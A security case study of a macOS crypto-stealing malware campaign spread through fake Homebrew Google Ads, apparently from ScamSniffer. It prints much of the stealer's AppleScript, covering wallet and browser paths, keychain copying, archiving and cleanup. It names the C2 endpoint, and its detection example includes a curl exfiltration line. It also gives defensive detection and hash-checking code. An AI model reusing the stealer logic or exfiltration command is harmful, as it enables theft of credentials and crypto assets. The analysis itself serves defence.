Crypto-Targeting Malware: A Case Study from Google Ads to Data Theft

Crypto-targeting malware is not a new threat, but its methods continue to evolve. In this case study, we analyze a recent attack that leverages Google Ads to distribute malicious scripts, ultimately stealing sensitive data from macOS users.


The Attack Chain: From Google Ads to Data Theft

This attack follows a well-defined chain, starting with fake Google Ads and ending with the execution of malicious scripts. Here’s how it works:

1. Fake Google Ads

  • Attackers create ads targeting keywords like “Homebrew.”
  • The ads look legitimate, often appearing at the top of search results.

2. Malicious Script Execution

  • Users click the ad and are redirected to a fake website mimicking the official Homebrew page.
  • The site offers a malicious installation script, hosted on norikosumiya.com.

3. Data Theft

  • The malware uses scripts to:
    • Steal browser data: cookies, passwords, and extensions (e.g., MetaMask, Coinbase Wallet, Phantom).
    • Harvest crypto wallet files: from Electrum, Exodus, Atomic Wallet, Ledger Live, and more.
    • Extract private keys and other sensitive data to drain crypto assets.
    • Access keychain data and Telegram files.

  The main body of the stealer’s AppleScript, with the getpwd handler elided:

on getpwd(username, writemind)
    ...
end getpwd

set username to (system attribute 'USER')
set profile to '/Users/' & username
-- staging directory: a random four-digit name under /tmp
set randomNumber to do shell script 'echo $((RANDOM % 9000 + 1000))'
set writemind to '/tmp/' & randomNumber & '/'
-- host fingerprint, written to <staging>/info
try
    set result to (do shell script 'system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType')
    writeText(result, writemind & 'info')
end try
set library to profile & '/Library/Application Support/'
-- fake prompt that captures the user's login password (see step 4)
set password_entered to getpwd(username, writemind)
delay 0.01
-- Chromium-based browser profiles and desktop wallet directories to collect
set chromiumMap to {{'Chrome', library & 'Google/Chrome/'}, {'Brave', library & 'BraveSoftware/Brave-Browser/'}, {'Edge', library & 'Microsoft Edge/'}, {'Vivaldi', library & 'Vivaldi/'}, {'Opera', library & 'com.operasoftware.Opera/'}, {'OperaGX', library & 'com.operasoftware.OperaGX/'}, {'Chrome Beta', library & 'Google/Chrome Beta/'}, {'Chrome Canary', library & 'Google/Chrome Canary'}, {'Chromium', library & 'Chromium/'}, {'Chrome Dev', library & 'Google/Chrome Dev/'}, {'Arc', library & 'Arc/'}, {'Coccoc', library & 'Coccoc/'}}
set walletMap to {{'deskwallets/Electrum', profile & '/.electrum/wallets/'}, {'deskwallets/Coinomi', library & 'Coinomi/wallets/'}, {'deskwallets/Exodus', library & 'Exodus/'}, {'deskwallets/Atomic', library & 'atomic/Local Storage/leveldb/'}, {'deskwallets/Wasabi', profile & '/.walletwasabi/client/Wallets/'}, {'deskwallets/Ledger_Live', library & 'Ledger Live/'}, {'deskwallets/Monero', profile & '/Monero/wallets/'}, {'deskwallets/Bitcoin_Core', library & 'Bitcoin/wallets/'}, {'deskwallets/Litecoin_Core', library & 'Litecoin/wallets/'}, {'deskwallets/Dash_Core', library & 'DashCore/wallets/'}, {'deskwallets/Electrum_LTC', profile & '/.electrum-ltc/wallets/'}, {'deskwallets/Electron_Cash', profile & '/.electron-cash/wallets/'}, {'deskwallets/Guarda', library & 'Guarda/'}, {'deskwallets/Dogecoin_Core', library & 'Dogecoin/wallets/'}, {'deskwallets/Trezor_Suite', library & '@trezor/suite-desktop/'}}
readwrite(library & 'Binance/app-store.json', writemind & 'deskwallets/Binance/app-store.json')
readwrite(library & '@tonkeeper/desktop/config.json', 'deskwallets/TonKeeper/config.json')
-- the login keychain is copied alongside the browser data
readwrite(profile & '/Library/Keychains/login.keychain-db', writemind & 'keychain')
if release then
    -- Apple Notes database and Safari cookies
    readwrite2(profile & '/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite', writemind & 'FileGrabber/NoteStore.sqlite')
    readwrite2(profile & '/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite-wal', writemind & 'FileGrabber/NoteStore.sqlite-wal')
    readwrite2(profile & '/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite-shm', writemind & 'FileGrabber/NoteStore.sqlite-shm')
    readwrite2(profile & '/Library/Containers/com.apple.Safari/Data/Library/Cookies/Cookies.binarycookies', writemind & 'FileGrabber/Cookies.binarycookies')
    readwrite(profile & '/Library/Cookies/Cookies.binarycookies', writemind & 'FileGrabber/saf1')
end if
filegrabber(writemind)
writeText(username, writemind & 'username')
-- Firefox-family profiles
set ff_paths to {library & 'Firefox/Profiles/', library & 'Waterfox/Profiles/', library & 'Pale Moon/Profiles/'}
repeat with firefox in ff_paths
    try
        parseFF(firefox, writemind)
    end try
end repeat
chromium(writemind, chromiumMap)
deskwallets(writemind, walletMap)
telegram(writemind, library)
-- archive the staging directory, exfiltrate it (step 5), then delete the evidence (step 6)
do shell script 'ditto -c -k --sequesterRsrc ' & writemind & ' /tmp/out.zip'
send_data(0)
do shell script 'rm -r ' & writemind
do shell script 'rm /tmp/out.zip'

4. Password Extraction

  • The malware uses a function called getpwd to trick users into entering their system password through fake prompts. With that password it can escalate privileges and access protected data such as the login keychain.

5. Data Exfiltration

  • All stolen data is compressed into a ZIP file and sent to a remote server (81.19.135.54/joinsystem) via curl with a custom header (userBuildID).

6. Cleanup

  • The malware deletes temporary files and directories to cover its tracks.
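The staging, archiving, exfiltration and cleanup sequence in steps 3, 5 and 6 leaves a recognizable trail in process-execution telemetry. The following Python is an added detection example, not code from the ScamSniffer analysis. The log line format, the pids and the exact curl flags are constructed assumptions; the /tmp/NNNN/ staging directory, the ditto command, the C2 endpoint and the userBuildID header are the indicators quoted above.

```python
"""
Added detection example (not code from the ScamSniffer write-up): score
process-execution log lines for the staging -> archive -> exfiltrate -> cleanup
sequence described in steps 3, 5 and 6. The log line format, the pids and the
exact curl flags are constructed assumptions; the /tmp/NNNN/ staging directory,
the ditto command, the C2 endpoint and the userBuildID header come from the
analysis.
"""
import re
from dataclasses import dataclass, field

# Indicators quoted in the write-up.
C2_HOST = "81.19.135.54"
C2_PATH = "/joinsystem"
CUSTOM_HEADER = "userBuildID"

# (rule name, regex over the command line, weight). Generic rules carry a low
# weight so they only matter in combination; the C2 rule alerts on its own.
RULES = [
    ("staging_dir_tmp_random",
     re.compile(r"/tmp/\d{4}/"), 1),
    ("system_profiler_recon",
     re.compile(r"system_profiler\s+SPSoftwareDataType\s+SPHardwareDataType"), 1),
    ("ditto_zip_of_staging_dir",
     re.compile(r"ditto\s+-c\s+-k\s+--sequesterRsrc\s+/tmp/\d{4}/\s+/tmp/out\.zip"), 3),
    ("curl_to_known_c2",
     re.compile(rf"curl\b.*{re.escape(C2_HOST)}{re.escape(C2_PATH)}"), 5),
    ("curl_custom_header",
     re.compile(rf"curl\b.*{CUSTOM_HEADER}"), 3),
    ("cleanup_rm_staging",
     re.compile(r"rm\s+(-r\s+)?/tmp/(\d{4}/?|out\.zip)"), 1),
]

# Assumed export format: "<timestamp> pid=<n> parent=<name> cmd=<command line>"
LOG_LINE = re.compile(
    r"^(?P<ts>\S+)\s+pid=(?P<pid>\d+)\s+parent=(?P<parent>\S+)\s+cmd=(?P<cmd>.*)$")


@dataclass
class Finding:
    line_no: int
    parent: str
    rules: list = field(default_factory=list)


def scan(lines):
    """Return (total_score, findings) for a sequence of log lines."""
    findings, score = [], 0
    for n, raw in enumerate(lines, 1):
        m = LOG_LINE.match(raw.strip())
        if not m:
            continue  # unparsable line: skip rather than abort the scan
        cmd = m.group("cmd")
        hits = [(name, weight) for name, rx, weight in RULES if rx.search(cmd)]
        if hits:
            score += sum(w for _, w in hits)
            findings.append(Finding(n, m.group("parent"), [name for name, _ in hits]))
    return score, findings


def is_alert(lines, threshold=5):
    """Alert when the combined score reaches the threshold."""
    return scan(lines)[0] >= threshold


# Constructed sample telemetry mirroring the tail end of the script.
SAMPLE_LOG = [
    "2025-01-10T09:12:01Z pid=4101 parent=osascript cmd=system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType",
    "2025-01-10T09:12:03Z pid=4108 parent=osascript cmd=ditto -c -k --sequesterRsrc /tmp/4821/ /tmp/out.zip",
    "2025-01-10T09:12:04Z pid=4110 parent=osascript cmd=curl -H 'userBuildID: 1234' -F file=@/tmp/out.zip http://81.19.135.54/joinsystem",
    "2025-01-10T09:12:05Z pid=4112 parent=osascript cmd=rm -r /tmp/4821/",
    "2025-01-10T09:12:05Z pid=4113 parent=osascript cmd=rm /tmp/out.zip",
    "2025-01-10T09:15:00Z pid=4200 parent=Terminal cmd=ls -la /tmp",
]

# Constructed benign activity that touches /tmp, ditto and curl without the pattern.
BENIGN_LOG = [
    "2025-01-10T10:00:00Z pid=5001 parent=Terminal cmd=curl -fsSL https://example.invalid/release-notes.txt",
    "2025-01-10T10:00:02Z pid=5002 parent=Terminal cmd=rm -rf /tmp/build",
    "2025-01-10T10:00:03Z pid=5003 parent=Terminal cmd=ditto -c -k src /tmp/src.zip",
]

if __name__ == "__main__":
    total, found = scan(SAMPLE_LOG)
    print(f"score={total} alert={is_alert(SAMPLE_LOG)}")
    for f in found:
        print(f"  line {f.line_no} ({f.parent}): {', '.join(f.rules)}")
```

The weights are deliberately uneven: a curl to the known C2 is enough to alert by itself, while the random /tmp directory or an rm under /tmp only count once they co-occur with the ditto archive or the custom header, which keeps ordinary build and download activity below the threshold.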

Key Insights from the Analysis

  1. Google Ads as a Distribution Channel:
    • Attackers exploit Google Ads to distribute malicious scripts, leveraging the trust users place in search engine results.
  2. Social Engineering:
    • The malware uses fake password prompts (getpwd) to trick users into providing their system credentials.
  3. Targeted Data Theft:
    • It specifically targets crypto users by stealing browser data, wallet files, and private keys.
  4. Evasion Techniques:
    • The malware avoids detection by using temporary directories and cleaning up after itself.

How to Protect Yourself

To protect yourself from these sophisticated attacks:

  1. Avoid Clicking on Ads:
    • Navigate to the official project site directly rather than through sponsored search results.
  2. Verify File Integrity:
    • Check file hashes or signatures before running scripts.
  3. Use Antivirus Software:
    • Regularly scan your system for malware.
  4. Be Wary of Password Prompts:
    • Never enter your system password unless you are certain of the prompt’s legitimacy.
  5. Store Private Keys Offline:
    • Use hardware wallets or cold storage to protect your crypto assets.
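Step 2 above recommends checking a script's hash before running it. The following Python is an added example, not code from the original article: it streams a downloaded file through SHA-256 and compares the result with a published digest in constant time. The script bytes and the "published" digest are constructed here so the example runs offline.

```python
"""
Added example (not code from the original article): check a downloaded install
script against a published SHA-256 digest before running it, as step 2 of the
protection list recommends. The script bytes and the 'published' digest are
constructed so the example runs offline.
"""
import hashlib
import hmac
import os
import tempfile


def sha256_of_bytes(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def sha256_of_file(path: str, chunk_size: int = 1 << 16) -> str:
    """Stream the file so a large download is not read into memory at once."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_script(path: str, expected_sha256: str) -> bool:
    """True only when the digest matches. compare_digest runs in constant time,
    so a mismatch does not reveal how many leading characters agreed."""
    actual = sha256_of_file(path)
    return hmac.compare_digest(actual, expected_sha256.strip().lower())


def demo() -> tuple:
    """Write a genuine and a tampered copy of a constructed install script and
    verify both against the genuine digest. Returns (genuine_ok, tampered_ok)."""
    genuine = b'#!/bin/sh\necho "installing example tool"\n'
    tampered = genuine + b'echo "one extra line changes the digest"\n'
    published = sha256_of_bytes(genuine)  # stands in for the vendor-published hash
    with tempfile.TemporaryDirectory() as d:
        g = os.path.join(d, "install.sh")
        t = os.path.join(d, "install_tampered.sh")
        with open(g, "wb") as f:
            f.write(genuine)
        with open(t, "wb") as f:
            f.write(tampered)
        return verify_script(g, published), verify_script(t, published)


if __name__ == "__main__":
    ok, bad = demo()
    print(f"genuine verified: {ok}, tampered verified: {bad}")
```

The check is only as good as where the expected digest comes from: take it from the project's own site or release page, not from the same page that served the download, since a fake site like the one in this case can publish a matching hash for its own malicious script.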

Evolution of Crypto-Targeting Malware

While crypto-targeting malware is not new, this case highlights how attackers are refining their methods. By combining social engineering (fake password prompts) with automated data extraction, they can bypass traditional security measures and maximize their impact.


Conclusion

Crypto users must remain vigilant as attackers continue to develop more sophisticated methods to steal digital assets. By following best practices and staying informed about emerging threats, you can better protect yourself from these attacks.

Stay safe, and share this information to help others in the crypto community.


About ScamSniffer

ScamSniffer is a security platform focused on Web3 anti-scam, providing real-time protection by combining off-chain and on-chain monitoring data. Our browser security extension helps users identify phishing websites and suspicious transactions, offering comprehensive protection for Web3 users.

Our security solutions have been adopted by wallets including Binance, Bybit, OneKey, Phantom, TokenPocket, and others, protecting millions of Web3 users monthly from phishing and fraud threats.

We are committed to building a safer Web3 ecosystem for the next billion users.


Stay informed, stay secure.
